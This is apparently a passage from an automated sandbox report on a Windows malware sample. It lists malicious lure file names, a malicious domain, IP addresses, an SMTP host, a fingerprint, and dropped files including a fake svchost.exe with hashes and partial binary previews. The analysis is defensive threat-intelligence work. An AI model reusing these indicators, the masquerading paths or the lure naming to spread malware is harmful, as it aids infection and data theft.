SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3764A540BD56887B40989BBA8472B701.html
PO75773937475895377.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-A351A04B41F167E0683896E2F2337BAE.html
New Order.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-1421F533C98822665897A4DD9D7F0337.html
Payment Slip E05060_47.doc | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-3764A540BD56887B40989BBA8472B701.html
Download Report.06.05.2021.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-F1A9BC92DE3D32C166EE1147BBB4E9DF.html
BL836477488575.exe | malicious | myliverpoolnews.cf/liverpool-fc-news/features/steven-gerrard-liverpool-future-dalglish--goal-B152C1FD7F94696A3AF39D8172651AE5.html

Domains

Match: myliverpoolnews.cf
Associated Sample Name / URL | Detection | Context
CWlXbVUJab.exe | malicious | 104.21.56.119
08042021New-PurchaseOrder.exe | malicious | 172.67.150.212
ETL_126_072_60.doc | malicious | 172.67.150.212
IMG_102-05_78_6.doc | malicious | 172.67.150.212
lfQuSBwdSf.exe | malicious | 104.21.56.119
RFQ-034.exe | malicious | 104.21.56.119
ACdEbpiSYO.exe | malicious | 172.67.150.212
Invoice_ord00000009.exe | malicious | 172.67.150.212
kayo.exe | malicious | 172.67.150.212
new_order20210408_14.doc | malicious | 172.67.150.212
BL01345678053567.exe | malicious | 104.21.56.119
new_order20210408_14.doc | malicious | 172.67.150.212
DHLdocument11022020680908911.exe | malicious | 172.67.150.212
20200804-8293847pdf.scr.exe | malicious | 104.21.56.119
234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | malicious | 172.67.150.212
items list.doc | malicious | 172.67.150.212
SKMC25832100083932157.jar | malicious | 104.21.56.119
SecuriteInfo.com.Artemis34DBCAD2CB5A.27289.exe | malicious | 104.21.56.119
Krishna Gangaa Enviro System Pvt Ltd.exe | malicious | 172.67.150.212
PO75773937475895377.exe | malicious | 104.21.56.119

Match: smtp.yandex.ru
Associated Sample Name / URL | Detection | Context
Swift_Copy.exe | malicious | 77.88.21.158
C6RET8T1Wi.exe | malicious | 77.88.21.158
RFQ# ZAT77095_pdf.exe | malicious | 77.88.21.158
AL JUNEIDI LIST.xlsx | malicious | 77.88.21.158
SWIFT.exe | malicious | 77.88.21.158
Payment _Advice (2).exe | malicious | 77.88.21.158
cricket.exe | malicious | 77.88.21.158
SG1_000000123205044_1.pdf.gz.exe | malicious | 77.88.21.158
Ordine d'acquisto 240517_04062021.exe | malicious | 77.88.21.158
Order 01042021-V728394-H16.pdf.exe | malicious | 77.88.21.158
RFQ#EX50GO_pdf.exe | malicious | 77.88.21.158
TRANSACTION_INTTRANSFER_1617266945242 MEDICON_PDF.exe | malicious | 77.88.21.158
Shandong CIRS Form.exe | malicious | 77.88.21.158
DHL_DELIVERY_CONFIRMATION_CBJ002042021068506.exe | malicious | 77.88.21.158
REQUEST QUOTATION BID..pdf.exe | malicious | 77.88.21.158
RFQ#ZAEL67012_doc.exe | malicious | 77.88.21.158
Q99Eljz7IT.exe | malicious | 77.88.21.158
SecuriteInfo.com.Trojan.PackedNET.576.12750.exe | malicious | 77.88.21.158
Swift Copy Against due Invoice.PDF.exe | malicious | 77.88.21.158
PO#ZA3MMA_pdf.exe | malicious | 77.88.21.158

ASN

Match: CLOUDFLARENETUS
Associated Sample Name / URL | Detection | Context
FFSetup5.7.1.0.exe | malicious | 104.18.88.101
order-invoice-amazon-#D01-9237793-8041853.DOCX.vbs | malicious | 162.159.134.233
PAGO.xlsx | malicious | 104.25.234.53
PaymentAdvice.exe | malicious | 104.21.85.234
PRODUCT_INQUIRY_PO_0009044_PDF.exe | malicious | 104.21.19.200
nDHV6wKWHF.exe | malicious | 162.159.133.233
CWlXbVUJab.exe | malicious | 172.67.150.212
08042021New-PurchaseOrder.exe | malicious | 172.67.150.212
ETL_126_072_60.doc | malicious | 172.67.150.212
IMG_102-05_78_6.doc | malicious | 172.67.150.212
MT103_YIU LIAN08042021_Xerox Scan_202104_.exe | malicious | 172.67.188.154
PO4308.exe | malicious | 104.21.49.158
pumYguna1i.exe | malicious | 23.227.38.74
gqnTRCdv5u.exe | malicious | 104.21.65.7
Calt7BoW2a.exe | malicious | 104.21.48.10
0BAdCQQVtP.exe | malicious | 23.227.38.74
lfQuSBwdSf.exe | malicious | 172.67.188.154
TazxfJHRhq.exe | malicious | 23.227.38.74
AQJEKNHnWK.exe | malicious | 23.227.38.74
hvEop8Y70Y.exe | malicious | 172.67.219.254

JA3 Fingerprints

Match: 54328bd36c14bd82ddaa0c04b25ed9ad
Associated Sample Name / URL | Detection | Context
order-invoice-amazon-#D01-9237793-8041853.DOCX.vbs | malicious | 104.21.56.119
nDHV6wKWHF.exe | malicious | 104.21.56.119
CWlXbVUJab.exe | malicious | 104.21.56.119
08042021New-PurchaseOrder.exe | malicious | 104.21.56.119
MT103_YIU LIAN08042021_Xerox Scan_202104_.exe | malicious | 104.21.56.119
lfQuSBwdSf.exe | malicious | 104.21.56.119
RFQ-034.exe | malicious | 104.21.56.119
ACdEbpiSYO.exe | malicious | 104.21.56.119
PURCHASE ORDER - XIFFA55,pdf.exe | malicious | 104.21.56.119
Invoice_ord00000009.exe | malicious | 104.21.56.119
kayo.exe | malicious | 104.21.56.119
RFQ 100400806 SUPPLY.exe | malicious | 104.21.56.119
new_order20210408_14.doc | malicious | 104.21.56.119
BL01345678053567.exe | malicious | 104.21.56.119
SER09090899.exe | malicious | 104.21.56.119
PURCHASE ORDER-34002174,pdf.exe | malicious | 104.21.56.119
cricket.exe | malicious | 104.21.56.119
DHLdocument11022020680908911.exe | malicious | 104.21.56.119
20200804-8293847pdf.scr.exe | malicious | 104.21.56.119
234d9ec1757404f8fd9fbb1089b2e50c08c5119a2c0ab.exe | malicious | 104.21.56.119

Dropped Files

Match: C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
Associated Sample Name / URL | Detection
new_order20210408_14.doc | malicious
new_order20210408_14.doc | malicious

                                                                            Created / dropped Files

                                                                            C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe
                                                                            Process:C:\Users\user\Desktop\qINcOlwRud.exe
                                                                            File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                            Category:dropped
                                                                            Size (bytes):46592
                                                                            Entropy (8bit):5.935771952119223
                                                                            Encrypted:false
                                                                            SSDEEP:768:67mDHfLLLkF0FenHiwAGflA7qOSn8bQ1xHWBnBeladzvRwyx0klmJc7z6GkZCcoz:7/ngF0m/87qOSn8bQ1xHWBnBeladzvRj
                                                                            MD5:D6B29ADD344D2284845F133B8505126E
                                                                            SHA1:FDB44B36F8C31A60A47DB4F4CE6D4975367D7A7C
                                                                            SHA-256:552A8D763C86BB50DED18CF8F790F18828C471EC5A4D3CAC71EAF7693314A04C
                                                                            SHA-512:7EC6E7F8F2EBE947B8B05EB4880D6A34D8B92965E7548FB5038716D5912BC299E3078B755373DF9B7414B61154E625D7B689FBD1F39DFB4363F382449BCE7FF6
                                                                            Malicious:true
                                                                            Antivirus:
                                                                            • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                            • Antivirus: ReversingLabs, Detection: 27%
                                                                            Joe Sandbox View:
                                                                            • Filename: new_order20210408_14.doc, Detection: malicious, Browse
                                                                            • Filename: new_order20210408_14.doc, Detection: malicious, Browse
                                                                            Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................."...0..j...J.......... ........@.. ....................... ......}.....@.................................t...W.......dF...........t............................................................... ............... ..H............text....i... ...j.................. ..`.rsrc...dF.......H...l..............@..@.reloc..............................@..B........................H........5..dT...........................................................*".(.....*Vs....(....t.........*".(.....*R.(.......s....}....*6.(....o,....*....0...........~.....+..*..0..9........r...p..((....rA..p.(......(......,...(.....+..~.....+..*....0..#........r...p..((....rA..p.(.......(.....*..0..9........s.....+........o....o.....o....,...o........o....o.....*....0...........(....o.....+.+........*.0.. ........rE..p.+..........s......%r[..p .........%.r...p.%.r...p.%.r...p
                                                                            C:\Program Files\Common Files\system\ItuUFCUFuPtBrvbgmZwrZlWEV\svchost.exe:Zone.Identifier
                                                                            Process:C:\Users\user\Desktop\qINcOlwRud.exe
                                                                            File Type:ASCII text, with CRLF line terminators
                                                                            Category:modified
                                                                            Size (bytes):26
                                                                            Entropy (8bit):3.95006375643621
                                                                            Encrypted:false
                                                                            SSDEEP:3:ggPYV:rPYV
                                                                            MD5:187F488E27DB4AF347237FE461A079AD
                                                                            SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                            SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                            SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                            Malicious:true
                                                                            Preview: [ZoneTransfer]....ZoneId=0
                                                                            C:\ProgramData\Microsoft\Network\Downloader\edb.log
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):4096
                                                                            Entropy (8bit):0.598865677794713
                                                                            Encrypted:false
                                                                            SSDEEP:6:0FE2XlEk1GaD0JOCEfMuaaD0JOCEfMKQmDQ8tAl/gz2cE0fMbhEZolrRSQ2hyYI8:0FXlrGaD0JcaaD0JwQQhtAg/0bjSQJ
                                                                            MD5:F11E15B78472F69B97503D4292D070BA
                                                                            SHA1:CD50BD1BEA2B1E0BCAAA45BDAC279F22CBDAF56F
                                                                            SHA-256:0750B07423BAC72248234A2F301C6ACFC867DBFEF6E65DAB0122A9C9ACBBD7E6
                                                                            SHA-512:CA06DF48F128A82919E920B490F9C6474C88E67FBDD7374AE7AB1CC5C51672D6338478A0A94CA66650403463F737BA1822C33BA14D35B6AEC138545368CF33AB
                                                                            Malicious:false
                                                                            Preview: ......:{..(.....,2...y............... ..1C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@...................,2...y............&......e.f.3...w.......................3...w..................h..C.:.\.P.r.o.g.r.a.m.D.a.t.a.\.M.i.c.r.o.s.o.f.t.\.N.e.t.w.o.r.k.\.D.o.w.n.l.o.a.d.e.r.\.q.m.g.r...d.b...G............................................................................................................................................................................................................
                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:Extensible storage engine DataBase, version 0x620, checksum 0xef57c920, page size 16384, DirtyShutdown, Windows version 10.0
                                                                            Category:dropped
                                                                            Size (bytes):32768
                                                                            Entropy (8bit):0.09640757787442658
                                                                            Encrypted:false
                                                                            SSDEEP:12:10+FNaXO4blElt8KL0+FNaXO4blElt8K:WIltQIlt
                                                                            MD5:719EFD2A4713236D0F5769706A8C0F07
                                                                            SHA1:4F2514E71BDB797404693EAAFE7750D0F4F21C17
                                                                            SHA-256:9F1BBDE7A73E6B43C2A3815580F73525A284EA8553114352F7A44B62274DBCC3
                                                                            SHA-512:6AD8BE15F1BB390034758CB8532ADF81D5FDF8D748DA88266E77A34F717971367F64049106C68A330FAC5A8D743FB814D595D50ABDCFA7D8595781D65D13689C
                                                                            Malicious:false
                                                                            Preview: .W. ... ................e.f.3...w........................&..........w..,2...y..h.(..............................3...w...........................................................................................................B...........@...................................................................................................... ........3...w........................................................................................................................................................................................................................................(,2...y_o................>[j.,2...y_.........................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):8192
                                                                            Entropy (8bit):0.11144688789275213
                                                                            Encrypted:false
                                                                            SSDEEP:3:XLEvJmTf+hl/bJdAtiwX2t9ltlall:Xy3t4faHtA
                                                                            MD5:D6C60ACE7A43017C5E256D2F766F725D
                                                                            SHA1:AC34F72323AF317CD51B7698DBE9F88DE3C7B738
                                                                            SHA-256:D2CE0D2DF4EF2376BF8986B1EE2E696E55EBA9A89E2695BEB30C6D9D802FDBA2
                                                                            SHA-512:69B0E02778A2C6F28D4D9CCAEA91653B1FBC3171B8D75AE5A285E870B56968F4D50F27D013E49E507413A3C8437A4A160B01FDFE6146758D3A18DFF9F1631048
                                                                            Malicious:false
                                                                            C:\ProgramData\Microsoft\Windows\WER\ReportArchive\AppCrash_qINcOlwRud.exe_4be3bb70756af94f97dfbc5a159826bdd2c5e33_fab20a83_17397b09\Report.wer
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):17404
                                                                            Entropy (8bit):3.760692848238617
                                                                            Encrypted:false
                                                                            SSDEEP:192:GdR8GMmHBUZMXKaKQqueZitu/u7sUS274Itgi:oGGtBUZMXKaFmJ/u7sUX4Itgi
                                                                            MD5:2ECC39DD818EB6236B43DCE95A96EA4F
                                                                            SHA1:6886D66FF7D87B2CF3C61F9AEE350A18CAF086AB
                                                                            SHA-256:541E16382EB454B1691928CF74AFC1A557EF80B1CF2FF54E1D37A2B705D8867D
                                                                            SHA-512:0115E2548640F5DB73B92AE90266811B1096EFC3E90369B0CF5F105B7D3EEAD1A36820384680EE7F874F435FEEECE660E8CD28502ADBFD87614A317DCC035DA1
                                                                            Malicious:true
                                                                            Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.2.6.2.3.8.5.0.4.7.5.8.3.9.9.8.9.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.6.2.3.8.5.0.5.1.4.9.0.2.4.2.3.....R.e.p.o.r.t.S.t.a.t.u.s.=.2.6.8.5.6.6.5.2.8.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.4.d.e.7.9.4.f.1.-.4.5.4.9.-.4.2.b.b.-.b.4.e.3.-.2.8.d.5.5.f.6.7.c.e.f.d.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.5.a.e.6.6.6.1.7.-.6.0.8.1.-.4.d.6.2.-.a.1.1.4.-.c.f.3.e.0.2.1.4.d.a.d.f.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.q.I.N.c.O.l.w.R.u.d...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.D.i.m.b.o.n.o...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.5.6.4.-.0.0.0.1.-.0.0.1.7.-.3.1.2.9.-.2.a.6.8.b.0.2.c.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.4.4.9.0.5.2.9.4.d.a.f.2.3.9.d.d.6.1.4.2.d.1.0.9.e.1.c.d.0.1.f.b.0.0.0.0.0.0.0.0.!.0.0.0.0.f.d.b.4.4.b.3.6.f.8.c.3.1.a.6.0.a.4.7.d.b.4.f.4.c.e.6.d.4.9.7.5.3.6.
                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER66E4.tmp.dmp
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:Mini DuMP crash report, 15 streams, Thu Apr 8 19:50:49 2021, 0x1205a4 type
                                                                            Category:dropped
                                                                            Size (bytes):329009
                                                                            Entropy (8bit):3.5951422808438074
                                                                            Encrypted:false
                                                                            SSDEEP:3072:uroCMCRhtlXDsN068Ljd+pRyBK8L9gIOgF5S+R/yB0rpUCgUSm99ty:urXMR06pe9RpDHFyBeTjp9e
                                                                            MD5:78BA18EB705FF85216912909983D514C
                                                                            SHA1:B0261588434274F00AB23730A3D4F4362D2B029A
                                                                            SHA-256:DFBAA76E5880EA2F2CA5C28D8BA953E1175232E9AB5523F804F744791703E8E2
                                                                            SHA-512:59EBA97CC681120A1BF3552BC8461D3702801856938DDAB8DE46D10023FA1D7371DDB4EBADAC4A4005FE63B82452F63536707D0933BD1EB428145C7969D475B4
                                                                            Malicious:false
                                                                            Preview: MDMP....... ........^o`...................U...........B......l1......GenuineIntelW...........T.......d...|^o`.............................0..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.............................................................................................................................................................................................................................................................................................................................................................................................................................................................d.b.g.c.o.r.e...i.3.8.6.,.1.0...0...1.7.1.3.4...1.........................................................................................................
                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER7462.tmp.WERInternalMetadata.xml
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):8404
                                                                            Entropy (8bit):3.697338148612842
                                                                            Encrypted:false
                                                                            SSDEEP:192:Rrl7r3GLNirh6O6YS+SU4GoBgmfZ7SZCprC89bu0sf66m:RrlsNid6O6YbSU4GoBgmflSqunfO
                                                                            MD5:A24C4A4DA2D157C546DB803C12A13277
                                                                            SHA1:152C35E5642E98DAAB8A2E1FB12DB6BA5643620A
                                                                            SHA-256:1C66F3F6A851E8E020FA4961574CAE4ADF70CBA2291A6CDC1CC4B7F8C748A3D6
                                                                            SHA-512:881F967BA3F3270FFCA7EC4531BAFA977022673BB3E4B56B98E0061A2D8A09115377AFB1B2638705E73E5188136F7FADC652C94EDF5858AFFBFC70DF3A5BBEEF
                                                                            Malicious:false
                                                                            Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.5.4.7.6.<./.P.i.d.>.......
                                                                            C:\ProgramData\Microsoft\Windows\WER\Temp\WER755D.tmp.xml
                                                                            Process:C:\Windows\SysWOW64\WerFault.exe
                                                                            File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                            Category:dropped
                                                                            Size (bytes):4750
                                                                            Entropy (8bit):4.474981915187786
                                                                            Encrypted:false
                                                                            SSDEEP:48:cvIwSD8zsXrJgtWI9pC2WSC8Be8fm8M4JUFFXw8+q8vQJE95b8Ndd:uITfXFLXSNxJWKqE7gNdd
                                                                            MD5:B656986BEA33064CD7B76CA4F2D1BDF8
                                                                            SHA1:94B9FA584477E84137B1D9F8C82429A4A319A503
                                                                            SHA-256:81744C814B4290707D32573DCA01569E379FFB1DF1CB23FBD131602C8D926268
                                                                            SHA-512:59F183D342547FEB6EEBD056C8B2D95A0DD1C6A6E655179C701CFAE6889821E58EB533F0A6655F5AB868F3AAA34002A9310653DF63F534BFB0EA6F402A434628
                                                                            Malicious:false
                                                                            Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="937741" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                            C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:data
                                                                            Category:modified
                                                                            Size (bytes):698
                                                                            Entropy (8bit):5.049094101509586
                                                                            Encrypted:false
                                                                            SSDEEP:12:reVGyMYx2Y5BYtmWNUc5AtYX5E4a2KryMYGH+ptsxptsOtw9O9S8:reUyMGF5ytmLcetYX5E2KryMb+zsxzsk
                                                                            MD5:B0CEEA53B3467F59FD8E87F80213BDE9
                                                                            SHA1:D9E6D1CBB480E7248658DF935648DFA733745602
                                                                            SHA-256:D9C93CB64E6F1F5BDC94581CEEA99F759EE1E35716EAF623C61962EA0152F9DD
                                                                            SHA-512:DDAA6C9FA3535B4926C60B692F8E202D10EB160D1F8BE7A9DE79239EF75AFD470403DF1D8F0CBF29A5F819E907D02E8E656BB9A52E71E30D9259987EAE881655
                                                                            Malicious:false
                                                                            Preview: PSMODULECACHE......w.e...a...C:\Program Files (x86)\WindowsPowerShell\Modules\PackageManagement\1.0.0.1\PackageManagement.psd1........Set-PackageSource........Unregister-PackageSource........Get-PackageSource........Install-Package........Save-Package........Get-Package........Find-Package........Install-PackageProvider........Import-PackageProvider........Get-PackageProvider........Register-PackageSource........Uninstall-Package........Find-PackageProvider........D..8.......C:\Program Files (x86)\WindowsPowerShell\Modules\Microsoft.PowerShell.Operation.Validation\1.0.1\Microsoft.PowerShell.Operation.Validation.psd1........Get-OperationValidation........Invoke-OperationValidation........
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\SyncVerbose.etl
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.11001645378947394
                                                                            Encrypted:false
                                                                            SSDEEP:12:264cNXm/Ey6q9995j1O5Cq3qQ10nMCldimE8eawHjcI:26yl68YHLyMCldzE9BHjcI
                                                                            MD5:52E7CD9CFE951AFF43554E0DE3B8B997
                                                                            SHA1:67242D8897B64653B9D88DE38A7DD2325C4001C2
                                                                            SHA-256:E648F33AD6FAFDF5C98C44E00B9693EBCE7F808E7468A2FF0EF9AB166464449F
                                                                            SHA-512:3557CF24C4ABB4E4EC767DCB0401D1F232990AD4788A4F42966C1DCF4893ADAAF60F6D1AB603498161A61C81C77B31BFF4F22C9126B66FD8BE7BC0A259E46064
                                                                            Malicious:false
                                                                            Preview: ........................................................................................b........................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................-.../..... .......~.,..........S.y.n.c.V.e.r.b.o.s.e...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.S.y.n.c.V.e.r.b.o.s.e...e.t.l...........P.P.........].......................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCircular.etl
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.11240757952414504
                                                                            Encrypted:false
                                                                            SSDEEP:12:kQjXm/Ey6q9995j151miM3qQ10nMCldimE8eawHza1miIIt6P:Ql68J1tMLyMCldzE9BHza1tIIta
                                                                            MD5:A62CB7BB85798669FF3234E3DAC3F91D
                                                                            SHA1:F00854979E29B74D6AC1AD98F43303C609F51A19
                                                                            SHA-256:D3EDDD4F125B49B6AC3CDA732B130B53B37B6FC8CE20937E8D053ADC56DDA24A
                                                                            SHA-512:808F38A4B21429498E737F63B3CCAFBD45F48CD3B7715558877F8843B5CD1C3669D8961158299CF9A1353862530F7906A7489E145C32D0955AFD4ACA4ED57593
                                                                            Malicious:false
                                                                            Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................-.../..... .......r~.,..........U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.i.r.c.u.l.a.r...e.t.l.......P.P.........y.......................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Packages\ActiveSync\LocalState\DiagOutputDir\UnistackCritical.etl
                                                                            Process:C:\Windows\System32\svchost.exe
                                                                            File Type:data
                                                                            Category:dropped
                                                                            Size (bytes):65536
                                                                            Entropy (8bit):0.11238374920897244
                                                                            Encrypted:false
                                                                            SSDEEP:12:kaXjXm/Ey6q9995j1ya1mK2P3qQ10nMCldimE8eawHza1mKsP:5Kl68D1iPLyMCldzE9BHza1g
                                                                            MD5:80677C026AE90172B17D5675F8516768
                                                                            SHA1:48322B64E39967C8945460B806CE05C387EE34E2
                                                                            SHA-256:36E23F16C8120D7C72009B13A5E14B65D3A4DFF724B10715EA8E73410B7899B7
                                                                            SHA-512:00B9372165AB4EF18455343925D7B604A82B3689E7F8D0BA2B138A4C02CA1B27B23F63DCD5CB9782A036CE7CCB56F75994766B693AB36214C71CC84F63EE99D1
                                                                            Malicious:false
                                                                            Preview: .................................................................................................................B..............Zb..................................................@.t.z.r.e.s...d.l.l.,.-.2.1.2.......................................................@.t.z.r.e.s...d.l.l.,.-.2.1.1...........................................................-.../..... .....l}L~.,..........U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...C.:.\.U.s.e.r.s.\.h.a.r.d.z.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.p.a.c.k.a.g.e.s.\.A.c.t.i.v.e.S.y.n.c.\.L.o.c.a.l.S.t.a.t.e.\.D.i.a.g.O.u.t.p.u.t.D.i.r.\.U.n.i.s.t.a.c.k.C.r.i.t.i.c.a.l...e.t.l.......P.P................................................................................................................................................................................................................................................................................................................................................................................................
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_213h4kn1.bm4.psm1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
                                                                            SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                                                                            SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                                                                            SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                                                                            Malicious:false
                                                                            Preview: 1
                                                                            C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_h5kukagc.411.psm1
                                                                            Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                            File Type:very short file (no magic)
                                                                            Category:dropped
                                                                            Size (bytes):1
                                                                            Entropy (8bit):0.0
                                                                            Encrypted:false
                                                                            SSDEEP:3:U:U
                                                                            MD5:C4CA4238A0B923820DCC509A6F75849B
